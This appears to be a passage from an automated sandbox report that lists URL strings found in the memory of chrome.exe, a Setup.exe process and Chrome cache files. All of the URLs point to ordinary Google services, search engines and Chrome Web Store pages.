Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/samlredirect
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 0000000D.00000002.2574197738.0000691400798000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmp, chromecache_67.14.dr, chromecache_69.14.dr; String found in binary or memory: https://apis.google.com
Source: chrome.exe, 0000000D.00000002.2586132880.0000691400C14000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes
Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
Source: chrome.exe, 0000000D.00000003.1932288737.0000691400605000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1931768505.000069140158E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929526429.0000691401604000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://calendar.google.com
Source: chrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp; String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: chrome.exe, 0000000D.00000002.2592575503.0000691400EB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2585385922.0000691400BBC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587041056.0000691400C6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2613155763.00006914018AC000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u
Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=enCtrl$1
Source: chrome.exe, 0000000D.00000003.1900763625.0000691401292000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900676282.000069140113C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1932134139.000069140114A000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1930172320.0000691401698000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
        Source: chrome.exe, 0000000D.00000003.1885460689.0000691000504000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
        Source: chrome.exe, 0000000D.00000003.1885460689.0000691000504000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
        Source: chrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
        Source: chrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
        Source: chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
        Source: chrome.exe, 0000000D.00000002.2583997178.0000691400B34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.goog
        Source: chrome.exe, 0000000D.00000003.1878459904.00004180000DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
        Source: chrome.exe, 0000000D.00000002.2592575503.0000691400EB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580258683.00006914009B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2564891753.0000691400180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
        Source: chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
        Source: chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
        Source: chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
        Source: chromecache_67.14.drString found in binary or memory: https://clients6.google.com
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
        Source: chromecache_67.14.drString found in binary or memory: https://content.googleapis.com
        Source: chrome.exe, 0000000D.00000002.2537616209.000001B008EED000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
        Source: chrome.exe, 0000000D.00000002.2579719052.0000691400974000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
        Source: chrome.exe, 0000000D.00000002.2604043288.0000691401380000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608165594.0000691401540000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
        Source: chrome.exe, 0000000D.00000003.1886045999.000069100055C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2602139949.00006914012C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2602139949.00006914012C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
        Source: chrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
        Source: chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2604613278.00006914013C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
        Source: chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2604613278.00006914013C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573693016.0000691400708000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
        Source: chromecache_67.14.drString found in binary or memory: https://domains.google.com/suggest/flow
        Source: chrome.exe, 0000000D.00000002.2604043288.0000691401380000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2574197738.0000691400798000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2e
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591800891.0000691400E6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596792163.0000691401060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: chrome.exe, 0000000D.00000003.1900343642.000069140107C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.google.com/icons?selected=Material
        Source: chrome.exe, 0000000D.00000002.2618618405.0000691401E04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?lang=en&family=Product
        Source: chromecache_69.14.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
        Source: chromecache_69.14.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
        Source: chromecache_69.14.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
        Source: chromecache_69.14.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
        Source: chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: chrome.exe, 0000000D.00000003.1934016786.0000691401A7E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic/intro?20
        Source: chrome.exe, 0000000D.00000003.1934016786.0000691401A7E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic2
        Source: chrome.exe, 0000000D.00000003.1885402808.00006910004E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hQ
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/mQ
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
        Source: chrome.exe, 0000000D.00000002.2561271210.0000691400004000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google.com/
        Source: chrome.exe, 0000000D.00000002.2579937966.000069140098C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
        Source: chrome.exe, 0000000D.00000003.1886045999.000069100055C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs
        Source: chrome.exe, 0000000D.00000003.1934861305.0000691401D54000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
        Source: chrome.exe, 0000000D.00000002.2590248453.0000691400DB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587041056.0000691400C6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611075318.0000691401750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
        Source: chrome.exe, 0000000D.00000002.2570779675.00006914004D4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
        Source: chrome.exe, 0000000D.00000003.1932288737.0000691400605000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929526429.0000691401604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
        Source: chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/:
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default_defaultult
        Source: chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
        Source: chrome.exe, 0000000D.00000002.2570779675.00006914004D4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
        Source: chrome.exe, 0000000D.00000002.2608165594.0000691401540000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
        Source: chrome.exe, 0000000D.00000002.2585522088.0000691400BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611297831.0000691401804000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
